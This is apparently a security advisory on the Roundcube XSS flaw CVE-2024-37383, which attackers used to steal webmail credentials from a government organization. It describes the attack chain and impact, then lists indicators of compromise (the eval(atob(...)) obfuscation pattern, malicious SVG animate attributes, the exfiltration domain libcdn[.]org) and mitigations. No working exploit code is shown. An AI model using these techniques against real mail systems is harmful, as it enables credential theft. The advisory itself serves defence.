The security flaw in the Roundcube webmail software was exploited by threat actors as part of a phishing attack targeting user credentials. According to Positive Technologies, the attack involved sending a seemingly empty email to a government organization within a Commonwealth of Independent States (CIS) country.

The email, first sent in June 2024, concealed its payload within the message body, using JavaScript code embedded in tags like eval(atob(…)), which would decode and execute the script. The attack targeting CVE-2024-37383 is a stored cross-site scripting (XSS) vulnerability in Roundcube webmail software, rated with a CVSS score of 6.1.

This flaw specifically exploits the SVG “animate” attributes, allowing remote attackers to inject and execute arbitrary JavaScript code in the victim’s web browser when a crafted email is opened. The attack enables access to sensitive data without requiring the user to click any links, as the malicious script is executed just by opening the email.

The vulnerability creates an ideal vector for phishing attacks. By tricking the recipient into opening a specially-crafted email, the attacker can remotely load and execute JavaScript, potentially stealing credentials or other sensitive information. The flaw was patched in May 2024 with the release of Roundcube versions 1.5.7 and 1.6.7.

In the final phase of the attack exploiting CVE-2024-37383 in Roundcube webmail, the compromised username and password credentials are exfiltrated to a remote server, “libcdn[.]org,” which is hosted on Cloudflare. The identity of the attackers remains unclear, but similar vulnerabilities in Roundcube have previously been exploited by notable hacking groups such as APT28, Winter Vivern, and TAG-70.

Although Roundcube is not the most widely used email client, it is still a key target for cybercriminals, particularly because it is often utilized by government agencies. Successful attacks on Roundcube can result in severe consequences, including the theft of highly sensitive information. This makes it an attractive target for both nation-state actors and criminal groups seeking valuable intelligence or credentials.

Technical Details:

Vulnerability Details:

• CVE ID: CVE-2024-37383
• CVSS Score: 6.1 (Medium severity)
• Vulnerability Type: Stored Cross-Site Scripting (XSS)
• Attack Vector: SVG “animate” attributes used to inject and execute arbitrary JavaScript code.

Attack Chain:

1. Vulnerability Exploitation: Attackers exploit the CVE-2024-37383 XSS vulnerability by sending a specially crafted email containing malicious JavaScript embedded in SVG “animate” attributes.
2. Execution of JavaScript: When the victim opens the email in the Roundcube webmail client, the JavaScript is executed in their web browser.
3. Credential Harvesting: The malicious script captures the user’s credentials (username and password).
4. Exfiltration: The stolen credentials are sent to a remote server (“libcdn[.]org”) hosted on Cloudflare.

Affected Products:

• Roundcube Webmail:
  • Vulnerable Versions: Versions prior to 1.5.7 and 1.6.7.
  • Patched Versions: 1.5.7 and 1.6.7, both released in May 2024.

Organizations using these older versions of Roundcube should update to the patched versions to avoid exploitation of the CVE-2024-37383 vulnerability.

Impact:

1. Credential Theft: Attackers can steal login credentials (username and password) by exploiting the stored XSS vulnerability. This can lead to unauthorized access to user accounts, enabling further malicious actions such as data exfiltration or privilege escalation.
2. Sensitive Data Exposure: Government agencies and organizations using Roundcube may store sensitive information in emails. Successful exploitation could allow attackers to access and steal confidential data, including internal communications and classified information.
3. Remote Code Execution (RCE): While this vulnerability specifically involves cross-site scripting (XSS), if the attacker combines it with other vulnerabilities, it may enable further exploitation, such as remote code execution, to gain full control over a compromised system.
4. Widespread Organizational Damage: As Roundcube is used in various government agencies, successful attacks could lead to breaches affecting national security, with attackers gaining access to classified documents or internal systems.
5. Phishing Campaigns: Stolen credentials could be used to launch spear-phishing campaigns against other users or organizations, extending the impact of the attack and leading to broader compromise.
6. Reputation and Trust Damage: Organizations affected by this attack may suffer reputational harm if sensitive data is leaked, impacting trust among stakeholders and potentially leading to legal or regulatory consequences.

Indicators of Compromise (IoCs):

1.      Malicious Domain:

Domain: libcdn[.]org

Hosted on Cloudflare, used for credential exfiltration in this attack.

2.      Email Indicators:

Email Body: Look for emails with missing or blank bodies containing encoded JavaScript using tags like eval(atob(…)).

Attachment Behavior: Emails where the attachment is hidden or not shown by the email client.

Specially Crafted SVG: Emails containing SVG files or attachments with malicious “animate” attributes embedded to exploit XSS vulnerabilities.

3.      Network Traffic:

Outbound Connections: Suspicious outbound traffic from Roundcube webmail servers or user machines to libcdn[.]org or other unknown external servers.

Anomalous HTTP Requests: Look for patterns of unexpected HTTP requests initiated by webmail clients, especially to external domains after email interactions.

4.      JavaScript Patterns:

Obfuscated JavaScript: Scripts within the email that are obfuscated and use the atob() function to decode Base64 strings, which may execute malicious code upon rendering.

eval() Usage: Embedded use of eval() in email content, commonly seen in exploitation attempts.

5.      Log Analysis:

Login Attempts: Unusual login activity or failed login attempts following the opening of malicious emails.

User Agent Changes: Changes in user-agent strings or login behaviors immediately following exposure to the malicious email.

6.      Suspicious File Hashes:

Hashes of any suspicious email attachments or SVG files identified as part of the attack can serve as IoCs. Consider submitting samples to antivirus databases or security vendors for hash matching.

Recommendations:

1. Update Roundcube to Latest Version:

Immediately upgrade to Roundcube versions 1.5.7 or 1.6.7 (or later), as these versions contain the necessary security patch for CVE-2024-37383.

2. Monitor and Block Malicious Domains:

Block traffic to known malicious domains, such as “libcdn[.]org”, to prevent exfiltration of credentials.

Regularly update blocklists to stay ahead of emerging threats.

3. Implement Web Application Firewalls (WAF):

Deploy a WAF to detect and block malicious payloads, such as XSS attempts, by inspecting incoming HTTP requests and email traffic.

4. Enable Content Security Policies (CSPs):

Enforce strict CSP headers to prevent the execution of malicious JavaScript within Roundcube. CSPs can block unauthorized inline scripts and external scripts from untrusted sources.

5. Conduct Regular Security Audits:

Perform regular security audits of webmail services and associated web applications to identify potential vulnerabilities.

Review email configurations to detect suspicious behavior or unauthorized access attempts.

6. Educate Users on Phishing Risks:

Train users to recognize phishing emails and suspicious attachments, emphasizing the risks of opening unexpected emails even from trusted sources.

7. Enable Two-Factor Authentication (2FA):

Implement 2FA for all user accounts to provide an additional layer of security. Even if credentials are compromised, attackers would need a second factor to access accounts.

8. Monitor for Suspicious Activity:

Regularly review login attempts, especially for signs of unusual access patterns such as logins from unexpected geographic locations or multiple failed login attempts.

Use intrusion detection systems (IDS) to detect anomalies in web traffic.

9. Backup Critical Data:

Ensure critical data is regularly backed up to protect against potential data loss or tampering

following a breach. Regular backups can help quickly restore services in case of a successful attack.